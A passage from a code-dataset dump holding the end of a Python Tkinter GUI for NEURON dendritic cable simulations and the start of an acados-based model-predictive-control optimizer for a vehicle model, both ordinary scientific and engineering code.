in item:\t\t\t\t\n\t\t\texec(item + \" = %s\"%float(temp_val))\n\n\t# Set spine parameters manually\n\tif Simulator.spines_exist:\n\t\tSimulator.UpdateSpineParams('neck', diam = Simulator.neck_diam,\n\t\t\t\t\t\t\t\t\t\t\tL = Simulator.neck_L,\n\t\t\t\t\t\t\t\t\t\t\tRa = Simulator.neck_Ra)\n\t\tSimulator.UpdateSpineParams('head', diam = Simulator.head_radius*2,\n\t\t\t\t\t\t\t\t\t\t\tL = Simulator.head_radius*2)\n\n\t# Set synapse parameters manually\n\texc_tstart = Simulator.t_start\n\tinh_tstart = exc_tstart + Simulator.dEI\n\tfor att in ['exc_tstart', 'inh_tstart']:\n\t\tsetattr(synapse_functions, att, eval(att))\n\ndef UpdateSynLocs():\n\n\tsynapse_filled_length = Simulator.dend.L - Simulator.start_syns\n\t\n\texc_start = Simulator.start_syns\n\texc_dist = GUI.Entries['synapse_exc']['exc_dist']['Var'].get()\n\tSimulator.CreateSynLocs('exc', exc_start, synapse_filled_length, Simulator.exc_dense, Simulator.dend.L, Simulator.exc_locs, dist_ = exc_dist)\n\n\tinh_start = Simulator.start_syns\n\tinh_dist = GUI.Entries['synapse_inh']['inh_dist']['Var'].get()\n\tSimulator.CreateSynLocs('inh', inh_start, synapse_filled_length, Simulator.inh_dense, Simulator.dend.L, Simulator.inh_locs, dist_ = inh_dist)\n\ndef UpdateErrorLabel(error_dict, error_msg=None):\n\tlabel = error_dict['Label']\n\tvar = error_dict['Var']\n\t\n\tif error_msg:\n\t\tif 'Warning' in error_msg:\n\t\t\tvar.set(error_msg)\n\t\t\tlabel['fg'] = 'darkorange'\n\t\telif 'Error' in error_msg:\n\t\t\tvar.set(error_msg)\n\t\t\tlabel['fg'] = 'red'\n\t\telse:\n\t\t\tvar.set(error_msg)\n\t\t\tlabel['fg'] = 'blue'\n\telse:\n\t\tvar.set('No error. Good!')\n\t\tlabel['fg'] = 'green'\n\ndef UpdatePresentedValues(labels_dict):\n\tlambda_ = Simulator.Calculate('lambda', Simulator.dend)\n\tlabels_dict['lambda']['Var'].set(u\"\\u03BB = %.2f cm = %.2f \\u03BCm\"%(lambda_, lambda_*1e4))\n\tlabels_dict['Ri']['Var'].set(u\"R\\u1d62 = %.2f M\\u2126\"%Simulator.Calculate('Rinput', Simulator.dend))\n\tlabels_dict['n_exc']['Var'].set(u\"N\\u2091\\u2093 = %i\"%Simulator.n_exc)\n\tlabels_dict['n_inh']['Var'].set(u\"N\\u2091\\u2093 = %i\"%Simulator.n_inh)\n\n# ================================= Callback Functions (everything user can activate) =================================\ndef AddSpines_callback(mode='button_callback'):\n\n\t# !! 
Check if adding spines when dist_='Freeze' keeps synapse locations and just puts spines there\n\tUpdateEntryParams(Simulator, GUI)\n\tUpdateSynLocs()\n\n\tif Simulator.spines_exist: # Either in the case of removing spines or just updating location (will be False for adding new spines)\n\t\tfor spine in h.allsec():\n\t\t\tif 'spine' in spine.name():\n\t\t\t\th.delete_section(sec=spine)\n\n\tif (mode=='update' and Simulator.spines_exist) or (mode=='button_callback' and GUI.Buttons['AddSpines']['text']=='Add Spines'):\n\t\tSimulator.spine_heads, Simulator.spine_necks = PutSpines('cable', Simulator.dend, Simulator.exc_locs, \n\t\t\t\t\t\t\t\t\t\t\t\t\tneck_diam = float(GUI.Entries['spines']['neck_diam']['Var'].get()), \n\t\t\t\t\t\t\t\t\t\t\t\t\tneck_len = float(GUI.Entries['spines']['neck_L']['Var'].get()), \n\t\t\t\t\t\t\t\t\t\t\t\t\thead_radius = float(GUI.Entries['spines']['head_radius']['Var'].get()), \n\t\t\t\t\t\t\t\t\t\t\t\t\tRa = float(GUI.Entries['spines']['neck_Ra']['Var'].get()), \n\t\t\t\t\t\t\t\t\t\t\t\t\tcm=Simulator.dend.cm, \n\t\t\t\t\t\t\t\t\t\t\t\t\te_pas = Simulator.dend.e_pas, \n\t\t\t\t\t\t\t\t\t\t\t\t\tg_pas=4.6716e-5)\n\t\tSimulator.spines_exist = True\n\t\tGUI.Buttons['AddSpines']['text'] = 'Remove Spines'\n\t\th.define_shape()\n\n\t\t# Unlock spine-related radio buttons\n\t\tGUI.RadioButtons['syn_loc']['Buttons'][0].config(state='normal')\n\t\tGUI.RadioButtons['volt_loc']['Buttons'][0].config(state='normal')\n\n\telif mode=='button_callback' and GUI.Buttons['AddSpines']['text']=='Remove Spines':\n\n\t\tSimulator.spine_heads, Simulator.spine_necks = [], []\n\t\tSimulator.spines_exist = False\n\n\t\tGUI.Buttons['AddSpines']['text'] = 'Add Spines'\n\n\t\t# Make sure user can't put synapses on non-existing spines\n\t\tGUI.RadioButtons['syn_loc']['Var'].set(2)\n\t\tGUI.RadioButtons['syn_loc']['Buttons'][0].config(state='disabled')\n\t\tGUI.RadioButtons['volt_loc']['Var'].set(2)\n\t\tGUI.RadioButtons['volt_loc']['Buttons'][0].config(state='disabled')\n\n\n\tSimulator.PlaceSynapses('exc')\n\tGUI.DrawSections(colors)\n\tUpdatePresentedValues(GUI.ChangingLabels)\n\ndef AddSoma_callback():\n\n\ts = ttk.Style()\n\ts.configure('Gray.TEntry', background='gray')\n\n\tif GUI.Buttons['AddSoma']['text'] == 'Add Soma':\n\n\t\tsoma_size = float(GUI.Entries['soma']['soma.diam']['Var'].get())\n\t\tsoma_cm = float(GUI.Entries['soma']['soma.cm']['Var'].get())\n\t\tSimulator.CreateCompartment('soma', \n\t\t\t\t\t\t\t\t\tL = soma_size, \n\t\t\t\t\t\t\t\t\tdiam = soma_size, \n\t\t\t\t\t\t\t\t\tRa = 110, \n\t\t\t\t\t\t\t\t\te_pas = h.v_init, \n\t\t\t\t\t\t\t\t\tg_pas = 1.0 / 1500.0, \n\t\t\t\t\t\t\t\t\tnseg = int(soma_size) * 5, \n\t\t\t\t\t\t\t\t\tcm = soma_cm)\n\t\t\n\t\th.disconnect(sec=Simulator.soma)\n\t\tSimulator.dend.connect(Simulator.soma, 1, 0) # Disconnect from parents if exist (following weird bug in which soma was created as child of last created section (spine head))\n\t\th.define_shape() # !Explain this\n\n\t\tGUI.Buttons['AddSoma']['text'] = 'Remove Soma' #!Toggle soma function inside GUI\n\t\tGUI.RadioButtons['volt_loc']['Buttons'][2].config(state='normal')\n\n\telif GUI.Buttons['AddSoma']['text'] == 'Remove Soma':\n\t\th.delete_section(sec=Simulator.soma)\n\t\tSimulator.soma = None\n\t\tGUI.Buttons['AddSoma']['text'] = 'Add Soma'\n\n\t\tGUI.RadioButtons['volt_loc']['Var'].set(2)\n\t\tGUI.RadioButtons['volt_loc']['Buttons'][2].config(state='disabled')\n\n\tGUI.DrawSections(colors)\n\tUpdatePresentedValues(GUI.ChangingLabels)\n\ndef RunSim_callback():\n\t# !Insert most of this 
to Simulator\n\tfor button in GUI.Buttons:\n\t\tif button is not 'Reset':\n\t\t\tGUI.Buttons[button].config(state='disabled')\n\n\tSimulator.RunSim()\n\n\tVoltRadio_callback([], [], [])\n\ndef Reset_callback():\n\tfor button in GUI.Buttons:\n\t\tGUI.Buttons[button].config(state='normal')\n\n\tfreeze_plots = GUI.CheckBoxes['freeze_plots']['Var'].get()\n\tif not freeze_plots:\n\t\tGUI.Figures['volt']['ax'].clear()\n\t\tGUI.Figures['volt']['graph'].draw()\n\n\tSimulator.vectors['t']\t\t\t= []\n\tSimulator.vectors['shaft_v']\t= []\n\tSimulator.vectors['spine_v']\t= []\n\tSimulator.vectors['soma_v']\t\t= []\n\ndef VoltRadio_callback(a, b, c):\n\t'''\n\tCallback to radio button indicating location of voltage traces to be shown in figure.\n\tInputs are eventdata (automatically generated by Tkinter).\n\t'''\n\tax = GUI.Figures['volt']['ax']\n\tgraph = GUI.Figures['volt']['graph']\n\tvar = GUI.RadioButtons['volt_loc']['Var']\n\n\tfreeze_plots = GUI.CheckBoxes['freeze_plots']['Var'].get()\n\tif not freeze_plots:\n\t\tax.clear()\n\n\tif var.get() == 1:\n\t\tax.plot(Simulator.vectors['t'], Simulator.vectors['spine_v'], color=colors['spine_head'])\n\t\tv_where = 'Spine'\n\t\n\telif var.get() == 2:\n\t\tax.plot(Simulator.vectors['t'], Simulator.vectors['shaft_v'], color=colors['dend'])\n\t\tv_where = 'Shaft'\n\t\n\telif var.get() == 3:\n\t\tax.plot(Simulator.vectors['t'], Simulator.vectors['soma_v'], color=colors['soma'])\n\t\tv_where = 'Soma'\n\t\n\telif var.get() == 4:\n\t\tax.plot(Simulator.vectors['t'], Simulator.vectors['shaft_v'], color=colors['dend'], label='Shaft')\n\t\t\n\t\tif len(Simulator.vectors['spine_v']) > 0:\n\t\t\tax.plot(Simulator.vectors['t'], Simulator.vectors['spine_v'], color=colors['spine_head'], label='Spine Head')\n\t\t\n\t\tif len(Simulator.vectors['soma_v']) > 0:\n\t\t\tax.plot(Simulator.vectors['t'], Simulator.vectors['soma_v'], color=colors['soma'], label='Soma')\n\n\t\tax.legend()\n\t\tv_where = 'All Recorded Locations'\n\n\tax.set_title('Voltage Trace in %s'%v_where)\n\tgraph.draw()\n\ndef UpdateMorph_callback():\n\t\"\"\"\n\tRun an update call on all GUI paraeters and functions. Including:\n\t\t- Updating parameters taken from entries\n\t\t- Updating synapse locations\n\t\t- Placing synapses according to updated locations\n\t\t- Re-drawing morphology\n\t\t- Updating calculated values presented to user\n\t\"\"\"\n\n\tUpdateEntryParams(Simulator, GUI)\n\n\t# Update spine locations\n\tUpdateSynLocs()\t\n\tAddSpines_callback(mode='update')\n\tSimulator.PlaceSynapses('exc')\n\tSimulator.PlaceSynapses('inh')\n\tGUI.DrawSections(colors)\n\n\tUpdatePresentedValues(GUI.ChangingLabels)\n\tUpdateErrorLabel(GUI.ChangingLabels['errors'])\n\ndef EntryTracking_callback(a, b, c):\n\t'''\n\tFunction called whenever an entry value is changed by user. \n\tInputs are eventdata (automatically generated by Tkinter).\n\t'''\n\n\tif not GUI.suppress_entry_callback:\n\t\tUpdateErrorLabel(GUI.ChangingLabels['errors'], \\\n\t\t\t'Warning: You changed something! Press \\'Update Morphology\\' to implement changes before running simulation')\n\n# ================================================ Initialize Parameters =================================================\n#! 
Add logs\ncolors = {\t'dend': 'black', \n\t\t\t'soma': 'lightblue', \n\t\t\t'spine_neck': 'royalblue', \n\t\t\t'spine_head': 'darkblue'}\n\n# !Get this inside Simulator and if arguments not given, default to it\n# All elements in this dictionary will appear as entries in GUI (separate keys for separate blocks)\nUserParamDict = {\n'simulation': OrderedDict([\n\t('dend.L', [u'Branch Length [\\u03BCm]', 80]), \n\t('dend.diam', [u'Branch Diameter [\\u03BCm]', 0.26]),\n\t('dend.cm', [u'Branch Capacitance [\\u03BCF/cm\\u00B2]', 1]),\n\t('start_syns', [u'Synapse Start [\\u03BCm]', 4]), \t\t\n\t('dEI', ['dt(E, I) [ms]', 10]),\n\t('h.v_init', ['Resting Potential [mV]', -75]),\n\t('h.tstop', ['Simulation Time', 250])\n\t]),\n'synapses': {'exc': OrderedDict([\n\t('exc_dense', ['Exc. Density', 0.58]),\n\t('exc_g_max', ['Exc. g_max', 0.4]),\n\t('exc_dist', ['Exc. Distribution', 'Uniform']),\n\t]),\n'inh': OrderedDict([\n\t('inh_dense', ['Inh. Density', 0.2]), \n\t('inh_g_max', ['Inh. gmax', 0.5]),\n\t('inh_dist', ['Inh. Distribution', 'Uniform'])\n\t])},\n'spines': OrderedDict([\n\t('neck_diam', [u'Neck diam [\\u03BCm]', 0.0394]),\n\t('neck_L', [u'Neck L [\\u03BCm]', 1]),\n\t('neck_Ra', [u'Neck Ra (per unit area) [\\u03A9-cm]', 50]),\n\t('head_radius', [u'Head radius [\\u03BCm]', 0.297])\t\n\t]),\n'soma': OrderedDict([\n\t('soma.diam', [u'diam [\\u03BCm]', 10]),\n\t('soma.cm', [u'Cm [\\u03BCF/cm\\u00B2]', 1])\t\n\t])\n}\n\nSimInitDict = {}\nSimInitDict.update(UserParamDict['simulation'])\nSimInitDict.update(UserParamDict['synapses']['exc'])\nSimInitDict.update(UserParamDict['synapses']['inh'])\n \nGUI = CableGUI('Cable Simulation', (1500, 750), 'white') # Main window object, from class CableGUI\nSimulator = Simulators(SimInitDict, GUI)\t\t\t\t # Simulator object, from class Simulators\n\nSimulator.CreateCompartment('dend', \n\tL = UserParamDict['simulation']['dend.L'][1], \n\tdiam = UserParamDict['simulation']['dend.diam'][1], \n\tcm = UserParamDict['simulation']['dend.cm'][1],\n\tRa = 150, \n\te_pas = UserParamDict['simulation']['h.v_init'][1], \n\tg_pas = 1.0 / 1500.0, \n\tnseg = int(UserParamDict['simulation']['dend.L'][1]) * 5)\n\n# ================================================ Create GUI - Main Window (root) =================================================\t\nGUI.AddLabel(GUI, text='Cable Simulation GUI', font=('TkDefaultFont', 30), foreground='darkred', background='white', sticky='W')\n\nGUI.AddButton(GUI, 'RunSim', 'Run Simulation', command=RunSim_callback, row=1, column=0)\nGUI.AddButton(GUI, 'Reset', 'Reset Simulation', command=Reset_callback, row=2, column=0)\nGUI.AddButton(GUI, 'UpdateMorph', 'Update Morphology', command=UpdateMorph_callback, row=1, column=1)\n\nGUI.AddTab('param_tab', 'Parameter Set', rowspan=3, columnspan=10)\nGUI.AddTab('fig_tab', 'Figures')\n\n# ================================================ Param Tab Design =================================================\n# Initialize parameters\nparams_col, image_row_span, AddColumn = 0, len(UserParamDict['simulation']) + 1, 5\nimage_dim, reported_dim = (1, 4), (2, 7)\n\n# Simulation- and synapse-related user entries\nGUI.AddEntries(GUI.Tabs['param_tab'], 'simulation', UserParamDict['simulation'], \n\t\t\t\t\t\tcommand=EntryTracking_callback, labelColumn=params_col, entryTitle='Set Simulation Parameters')\n\n\nGUI.AddRadioButton(GUI.Tabs['param_tab'], 'syn_loc', [\"Synapses on Spines\", \"Synapses on Shaft\"], \n\t\t\t\t\t\tcommand=EntryTracking_callback, default_val=2, sticky='WE', 
column=0)\n\nGUI.RadioButtons['syn_loc']['Buttons'][0].config(state='disabled')\n\nGUI.AddEntries(GUI.Tabs['param_tab'], 'synapse_exc', UserParamDict['synapses']['exc'], \n\t\t\t\t\t\tcommand=EntryTracking_callback, labelColumn=params_col, entryTitle='Exc. Synapses')\n\nGUI.AddEntries(GUI.Tabs['param_tab'], 'synapse_inh', UserParamDict['synapses']['inh'], \n\t\t\t\t\t\tcommand=EntryTracking_callback, labelColumn=params_col, entryTitle='Inh. Synapses')\n\n# Morphology figure\nGUI.PutFigure(GUI.Tabs['param_tab'], 'morph', xlabel='X', ylabel='Y', facecolor='darkgray', \n\t\t\t\t\t\trow=image_dim[0], column=image_dim[1], rowspan=image_row_span, columnspan=3, padx=45)\n\n# Add compartments buttons\nAddSpines_row = image_dim[0] + image_row_span\nGUI.AddButton(GUI.Tabs['param_tab'], 'AddSpines', 'Add Spines', \n\t\t\t\t\t\tcommand=AddSpines_callback, row=AddSpines_row, column=AddColumn)\nGUI.AddEntries(GUI.Tabs['param_tab'], 'spines', UserParamDict['spines'], \n\t\t\t\t\t\tcommand=EntryTracking_callback, labelRow=AddSpines_row, labelColumn=AddColumn+1)\nSimulator.spines_exist = False\n\nprint('!!! Make actual spine params change with entry!!!')\n\nAddSoma_row = AddSpines_row + 1 + len(GUI.Entries['spines'])\nGUI.AddButton(GUI.Tabs['param_tab'], 'AddSoma', 'Add Soma', \n\t\t\t\t\t\tcommand=AddSoma_callback, row=AddSoma_row, column=AddColumn)\nGUI.AddEntries(GUI.Tabs['param_tab'], 'soma', UserParamDict['soma'], \n\t\t\t\t\t\tcommand=EntryTracking_callback, labelRow=AddSoma_row, labelColumn=AddColumn+1)\n\n# Add text presented to user\nGUI.AddLabel(GUI.Tabs['param_tab'], text='Calculated Values', font=15, row=reported_dim[0], column=reported_dim[1])\nfor i, name in enumerate(['lambda', 'Ri', 'n_exc', 'n_inh']):\n\tGUI.AddLabel(GUI.Tabs['param_tab'], varName=name, font=15, fg='darkgreen',\n\t\t\t\t\t\trow=reported_dim[0]+i+1, column=reported_dim[1], padx=5, sticky='We')\nUpdatePresentedValues(GUI.ChangingLabels)\n\nGUI.AddLabel(GUI.Tabs['param_tab'], varName='errors', font=15, column=0, columnspan=10, padx=5, sticky='WE')\nUpdateErrorLabel(GUI.ChangingLabels['errors'], None)\n\n# ================================================ Figure Tab Design =================================================\nGUI.PutFigure(GUI.Tabs['fig_tab'], 'volt', xlabel='T (ms)', ylabel='Voltage (mV)', facecolor = 'gray', row=1)\nGUI.AddCheckbox(GUI.Tabs['fig_tab'], \"Freeze Plots\", 'freeze_plots', False, sticky='W') \n\nGUI.AddRadioButton(GUI.Tabs['fig_tab'], 'volt_loc', \n\t[\"Show Spine Voltage\", \"Show Shaft Voltage\", \"Show Soma Voltage\", \"Show Overlay of Voltages\"], \n\tcommand=VoltRadio_callback, default_val=2, sticky='WE')\nGUI.RadioButtons['volt_loc']['Buttons'][0].config(state='disabled')\nGUI.RadioButtons['volt_loc']['Buttons'][2].config(state='disabled')\n\n# ================================================ Make Updates =================================================\nUpdateSynLocs()\nSimulator.PlaceSynapses('exc')\nSimulator.PlaceSynapses('inh')\nGUI.DrawSections(colors) \n\nprint('*****\\nTO DO:\\n \\\n\t- After defaulting to uniform locations change exc_dense to \\'Uniform\\'\\\n\t- Add option for changing spine neck resistance, length, diam and head size!\\n\\\n\t- In freeze plots think of option to go freeze in all compartments (maybe put on different axes and show one each time if possible?)\\n\\\n\t- IMPORTANT: After updating entry params make sure real values update!\\n*****')\n\n", "repo_name": "hadasman/SimulationGUI_new", "sub_path": "MainScript.py", "file_name": "MainScript.py", "file_ext": 
"py", "file_size_in_byte": 16637, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.chdir", "line_number": 6, "usage_type": "call"}, {"api_name": "matplotlib.use", "line_number": 8, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 10, "usage_type": "call"}, {"api_name": "neuron.h.allsec", "line_number": 113, "usage_type": "call"}, {"api_name": "neuron.h", "line_number": 113, "usage_type": "name"}, {"api_name": "neuron.h.delete_section", "line_number": 115, "usage_type": "call"}, {"api_name": "neuron.h", "line_number": 115, "usage_type": "name"}, {"api_name": "neuron.h.define_shape", "line_number": 128, "usage_type": "call"}, {"api_name": "neuron.h", "line_number": 128, "usage_type": "name"}, {"api_name": "neuron.h.v_init", "line_number": 165, "usage_type": "attribute"}, {"api_name": "neuron.h", "line_number": 165, "usage_type": "name"}, {"api_name": "neuron.h.disconnect", "line_number": 170, "usage_type": "call"}, {"api_name": "neuron.h", "line_number": 170, "usage_type": "name"}, {"api_name": "neuron.h.define_shape", "line_number": 172, "usage_type": "call"}, {"api_name": "neuron.h", "line_number": 172, "usage_type": "name"}, {"api_name": "neuron.h.delete_section", "line_number": 178, "usage_type": "call"}, {"api_name": "neuron.h", "line_number": 178, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 294, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 303, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 308, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 313, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 319, "usage_type": "call"}]} +{"seq_id": "23963979260", "text": "\"\"\" Implementation of the nonlinear optimizer for the data-augmented MPC.\n\nThis program is free software: you can redistribute it and/or modify it under\nthe terms of the GNU General Public License as published by the Free Software\nFoundation, either version 3 of the License, or (at your option) any later\nversion.\nThis program is distributed in the hope that it will be useful, but WITHOUT\nANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\nYou should have received a copy of the GNU General Public License along with\nthis program. If not, see .\n\"\"\"\n\n\nimport os\nimport sys\nimport shutil\nimport casadi as cs\nimport numpy as np\nfrom copy import copy\nfrom acados_template import AcadosOcp, AcadosOcpSolver, AcadosModel\nfrom ad_mpc.ad_3d import AD3D\nfrom model_fitting.gp import GPEnsemble\nfrom utils.utils import skew_symmetric, v_dot_q, safe_mkdir_recursive, quaternion_inverse\n# from utils.quad_3d_opt_utils import discretize_dynamics_and_cost\n\n\nclass AD3DOptimizer:\n def __init__(self, ad, t_horizon=1, n_nodes=20, q_cost=None, r_cost=None, model_name=\"ad_3d_acados_mpc\", solver_options=None):\n \"\"\"\n :param quad: ad object\n :type quad: AD3D\n :param t_horizon: time horizon for MPC optimization\n :param n_nodes: number of optimization nodes until time horizon\n :param q_cost: diagonal of Q matrix for LQR cost of MPC cost function. Must be a numpy array of length 12.\n :param r_cost: diagonal of R matrix for LQR cost of MPC cost function. Must be a numpy array of length 4.\n :param solver_options: Optional set of extra options dictionary for solvers. 
\n \"\"\"\n\n # Weighted squared error loss function q = (p_xyz, a_xyz, v_xyz, r_xyz), r = (u1, u2, u3, u4)\n if q_cost is None:\n q_cost = np.array([1.0, 1.0, 10., 5.0])\n if r_cost is None:\n r_cost = np.array([10.0, 100.0]) \n\n self.T = t_horizon # Time horizon\n self.N = n_nodes # number of control nodes within horizon\n\n\n self.ad = ad\n \n self.steering_min = ad.steering_min\n self.steering_max = ad.steering_max\n self.acc_min = ad.acc_min\n self.acc_max = ad.acc_max\n\n # Declare model variables\n self.p = cs.MX.sym('p', 2) # position\n self.s = cs.MX.sym('s', 1) # psi \n self.v = cs.MX.sym('v', 1) # velocity \n\n # Full state vector (4-dimensional)\n self.x = cs.vertcat(self.p, self.s, self.v)\n self.state_dim = 4\n\n # Control input vector\n u1 = cs.MX.sym('u1')\n u2 = cs.MX.sym('u2')\n \n self.u = cs.vertcat(u1, u2)\n\n # Nominal model equations symbolic function (no GP)\n self.ad_xdot_nominal = self.ad_dynamics()\n\n # Initialize objective function, 0 target state and integration equations\n self.L = None\n self.target = None\n\n\n # Build full model. Will have 4 variables. self.dyn_x contains the symbolic variable that\n # should be used to evaluate the dynamics function. It corresponds to self.x if there are no GP's, or\n # self.x_with_gp otherwise\n acados_models, nominal_with_gp = self.acados_setup_model(\n self.ad_xdot_nominal(x=self.x, u=self.u)['x_dot'], model_name)\n\n \n # Convert dynamics variables to functions of the state and input vectors\n self.ad_xdot = {}\n for dyn_model_idx in nominal_with_gp.keys():\n dyn = nominal_with_gp[dyn_model_idx]\n self.ad_xdot[dyn_model_idx] = cs.Function('x_dot', [self.x, self.u], [dyn], ['x', 'u'], ['x_dot'])\n\n # ### Setup and compile Acados OCP solvers ### #\n self.acados_ocp_solver = {}\n\n \n # Ensure current working directory is current folder\n os.chdir(os.path.dirname(os.path.realpath(__file__)))\n self.acados_models_dir = '../../acados_models'\n safe_mkdir_recursive(os.path.join(os.getcwd(), self.acados_models_dir))\n\n for key, key_model in zip(acados_models.keys(), acados_models.values()):\n nx = key_model.x.size()[0]\n nu = key_model.u.size()[0]\n ny = nx + nu\n n_param = key_model.p.size()[0] if isinstance(key_model.p, cs.MX) else 0\n\n acados_source_path = os.environ['ACADOS_SOURCE_DIR']\n sys.path.insert(0, '../common')\n\n # Create OCP object to formulate the optimization\n ocp = AcadosOcp()\n ocp.acados_include_path = acados_source_path + '/include'\n ocp.acados_lib_path = acados_source_path + '/lib'\n ocp.model = key_model\n ocp.dims.N = self.N\n ocp.solver_options.tf = t_horizon\n\n # Initialize parameters\n ocp.dims.np = n_param\n ocp.parameter_values = np.zeros(n_param)\n\n ocp.cost.cost_type = 'LINEAR_LS'\n ocp.cost.cost_type_e = 'LINEAR_LS'\n\n ocp.cost.W = np.diag(np.concatenate((q_cost, r_cost)))\n ocp.cost.W_e = np.diag(q_cost)\n terminal_cost = 0 if solver_options is None or not solver_options[\"terminal_cost\"] else 1\n ocp.cost.W_e *= terminal_cost\n\n ocp.cost.Vx = np.zeros((ny, nx))\n ocp.cost.Vx[:nx, :nx] = np.eye(nx)\n ocp.cost.Vu = np.zeros((ny, nu))\n ocp.cost.Vu[-2:, -2:] = np.eye(nu)\n\n ocp.cost.Vx_e = np.eye(nx)\n\n # Initial reference trajectory (will be overwritten)\n x_ref = np.zeros(nx)\n ocp.cost.yref = np.concatenate((x_ref, np.array([0.0, 0.0])))\n ocp.cost.yref_e = x_ref\n\n # Initial state (will be overwritten)\n ocp.constraints.x0 = x_ref\n\n # Set constraints\n ocp.constraints.lbu = np.array([self.acc_min, self.steering_min])\n ocp.constraints.ubu = np.array([self.acc_max, 
self.steering_max])\n ocp.constraints.idxbu = np.array([0, 1])\n\n # Solver options\n ocp.solver_options.qp_solver = 'FULL_CONDENSING_HPIPM'\n ocp.solver_options.hessian_approx = 'GAUSS_NEWTON'\n ocp.solver_options.integrator_type = 'ERK'\n ocp.solver_options.print_level = 0\n ocp.solver_options.nlp_solver_type = 'SQP_RTI' if solver_options is None else solver_options[\"solver_type\"]\n\n # Compile acados OCP solver if necessary\n json_file = os.path.join(self.acados_models_dir, key_model.name + '_acados_ocp.json')\n self.acados_ocp_solver[key] = AcadosOcpSolver(ocp, json_file=json_file)\n\n def clear_acados_model(self):\n \"\"\"\n Removes previous stored acados models to avoid name conflicts.\n \"\"\"\n\n json_file = os.path.join(self.acados_models_dir, 'acados_ocp.json')\n if os.path.exists(json_file):\n os.remove(os.path.join(os.getcwd(), json_file))\n compiled_model_dir = os.path.join(os.getcwd(), 'c_generated_code')\n if os.path.exists(compiled_model_dir):\n shutil.rmtree(compiled_model_dir)\n\n \n def acados_setup_model(self, nominal, model_name):\n \"\"\"\n Builds an Acados symbolic models using CasADi expressions.\n :param model_name: name for the acados model. Must be different from previously used names or there may be\n problems loading the right model.\n :param nominal: CasADi symbolic nominal model of the AD: f(self.x, self.u) = x_dot, dimensions 4x1.\n :return: Returns a total of three outputs, where m is the number of GP's in the GP ensemble, or 1 if no GP:\n - A dictionary of m AcadosModel of the GP-augmented AD\n - A dictionary of m CasADi symbolic nominal dynamics equations with GP mean value augmentations (if with GP)\n :rtype: dict, dict, cs.MX\n \"\"\"\n def fill_in_acados_model(x, u, p, dynamics, name):\n\n x_dot = cs.MX.sym('x_dot', dynamics.shape)\n f_impl = x_dot - dynamics\n\n # Dynamics model\n model = AcadosModel()\n model.f_expl_expr = dynamics\n model.f_impl_expr = f_impl\n model.x = x\n model.xdot = x_dot\n model.u = u\n model.p = p\n model.name = name\n\n return model\n\n acados_models = {}\n dynamics_equations = {}\n\n\n # No available GP so return nominal dynamics\n dynamics_equations[0] = nominal\n\n x_ = self.x\n dynamics_ = nominal\n\n acados_models[0] = fill_in_acados_model(x=x_, u=self.u, p=[], dynamics=dynamics_, name=model_name)\n\n return acados_models, dynamics_equations\n\n def ad_dynamics(self):\n \"\"\"\n Symbolic dynamics of the 2D AD model. The state consists on: [p_xy, psi, speed]^T.\n The input of the system is: [u_1, u_2], i.e. acceleration & delta(steering angle)\n\n :return: CasADi function that computes the analytical differential state dynamics of the quadrotor model.\n Inputs: 'x' state of AD (4x1) and 'u' control input (2x1). 
Output: differential state vector 'x_dot'\n (4x1)\n \"\"\"\n x_dot = cs.vertcat(self.p_dynamics(), self.s_dynamics(), self.v_dynamics())\n return cs.Function('x_dot', [self.x[:4], self.u], [x_dot], ['x', 'u'], ['x_dot'])\n\n def p_dynamics(self):\n beta = cs.atan(self.ad.L_R / (self.ad.L_F + self.ad.L_R) * cs.tan(self.u[1])) \n return cs.vertcat(self.v * cs.cos(self.s + beta), self.v * cs.sin(self.s+beta))\n\n def s_dynamics(self):\n beta = cs.atan(self.ad.L_R / (self.ad.L_F + self.ad.L_R) * cs.tan(self.u[1])) \n return self.v/self.ad.L_R*cs.sin(beta)\n\n def v_dynamics(self): \n return self.u[0] \n\n def set_reference_state(self, x_target=None, u_target=None):\n \"\"\"\n Sets the target state and pre-computes the integration dynamics with cost equations\n :param x_target: 4-dimensional target state (p_xyz, a_wxyz, v_xyz, r_xyz)\n :param u_target: 2-dimensional target control input vector (u_1, u_2, u_3, u_4)\n \"\"\"\n if x_target is None:\n x_target = [[0, 0, 0, 0]]\n return\n if u_target is None:\n u_target = [0, 0]\n return\n # Set new target state\n self.target = copy(x_target)\n gp_ind = 0\n ref = np.concatenate((x_target, u_target))\n x_target = np.array(x_target)\n for j in range(self.N):\n self.acados_ocp_solver[gp_ind].set(j, \"yref\", ref)\n self.acados_ocp_solver[gp_ind].set(self.N, \"yref\", x_target)\n return gp_ind\n\n def set_reference_trajectory(self, x_target, u_target):\n \"\"\"\n Sets the reference trajectory and pre-computes the cost equations for each point in the reference sequence.\n :param x_target: Nx4-dimensional reference trajectory (p_xy, psi, vel). It is passed in the\n form of a 3-length list, where the first element is a Nx2 numpy array referring to the position targets, the\n second is a Nx1 array referring to the yaw, one Nx1 arrays for the speed.\n :param u_target: Nx2-dimensional target control input vector (u1, u2)\n \"\"\"\n ##########################################################################################\n # if u_target is not None:\n # assert x_target[0].shape[0] == (u_target.shape[0] + 1) or x_target[0].shape[0] == u_target.shape[0]\n\n # # If not enough states in target sequence, append last state until required length is met\n while x_target.shape[0] < self.N+1:\n x_target = np.vstack((x_target,x_target[-1,:]))\n u_target = np.vstack((u_target,u_target[-1,:]))\n \n # x_target = [np.concatenate(x_target, x_target[-1,:], 0) for x in x_target]\n # if u_target is not None:\n # u_target = np.concatenate((u_target, np.expand_dims(u_target[-1, :], 0)), 0)\n\n # stacked_x_target = np.concatenate([x for x in x_target], 1)\n ##########################################################################################\n gp_ind = 0\n # tmp = x_target[:,2] \n # np.place(tmp,tmp < -3, tmp+2*np.pi)\n # x_target[:,2] = tmp\n self.target = copy(x_target) \n print(x_target) \n stacked_x_target = x_target \n \n \n for j in range(self.N):\n ref = stacked_x_target[j, :]\n ref = np.concatenate((ref, u_target[j, :]))\n self.acados_ocp_solver[gp_ind].set(j, \"yref\", ref)\n # the last MPC node has only a state reference but no input reference\n self.acados_ocp_solver[gp_ind].set(self.N, \"yref\", 